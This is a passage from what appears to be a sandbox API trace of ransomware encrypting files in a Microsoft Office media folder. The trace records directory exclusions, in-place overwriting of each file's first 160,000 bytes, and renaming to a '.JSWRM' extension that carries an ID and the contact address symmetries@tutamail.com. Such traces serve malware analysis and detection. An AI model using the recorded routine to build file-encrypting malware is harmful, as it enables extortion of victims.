office\\root\\office16\\media\\lync_ringtone6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.695] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=356896) returned 1 [0135.695] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.695] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.708] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.708] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.709] CloseHandle (hObject=0x238) returned 1 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0135.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0135.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0135.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0135.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0135.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.709] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone6.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone6.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone6.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone6.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0135.711] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b192318, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b192318, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158830, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone7.wav", cAlternateFileName="LYA2C6~1.WAV")) returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2=".") returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="..") returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="...") returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="windows") returned -1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="recovery") returned -1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="perflogs") returned -1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="documents and settings") returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="system volume information") returned -1 [0135.711] lstrcmpiW (lpString1="LYNC_ringtone7.wav", lpString2="msocache") returned -1 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone7.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone7.wav", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone7.wav", lpUsedDefaultChar=0x0) returned 18 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone7.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone7.wav", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone7.wav", lpUsedDefaultChar=0x0) returned 18 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0135.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0135.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone7.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.712] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1411120) returned 1 [0135.712] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.712] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.726] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.726] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.726] CloseHandle (hObject=0x238) returned 1 [0135.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0135.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0135.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0135.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0135.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0135.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0135.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.727] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone7.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone7.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone7.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone7.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0135.728] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1de7ad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1de7ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ad84, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_secondcall.wav", cAlternateFileName="LYNC_S~1.WAV")) returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2=".") returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="..") returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="...") returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="windows") returned -1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="recovery") returned -1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="perflogs") returned -1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="documents and settings") returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="system volume information") returned -1 [0135.728] lstrcmpiW (lpString1="LYNC_secondcall.wav", lpString2="msocache") returned -1 [0135.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_secondcall.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0135.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_secondcall.wav", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_secondcall.wav", lpUsedDefaultChar=0x0) returned 19 [0135.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_secondcall.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0135.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_secondcall.wav", cchWideChar=19, lpMultiByteStr=0x2413a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_secondcall.wav", lpUsedDefaultChar=0x0) returned 19 [0135.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0135.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0135.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0135.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_secondcall.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_secondcall.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.730] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=306564) returned 1 [0135.730] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.730] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.791] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.791] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.791] CloseHandle (hObject=0x238) returned 1 [0135.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0135.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0135.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0135.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0135.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0135.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0135.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_secondcall.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_secondcall.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_secondcall.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_secondcall.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0135.794] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1de7ad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1de7ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3adc8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_untag.wav", cAlternateFileName="LYNC_U~1.WAV")) returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2=".") returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="..") returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="...") returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="windows") returned -1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="recovery") returned -1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="perflogs") returned -1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="documents and settings") returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="system volume information") returned -1 [0135.794] lstrcmpiW (lpString1="LYNC_untag.wav", lpString2="msocache") returned -1 [0135.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0135.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_untag.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_untag.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_untag.wav", lpUsedDefaultChar=0x0) returned 14 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0135.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0135.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_untag.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_untag.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_untag.wav", lpUsedDefaultChar=0x0) returned 14 [0135.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0135.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0135.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0135.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0135.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_untag.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_untag.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.796] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=241096) returned 1 [0135.796] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.796] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, 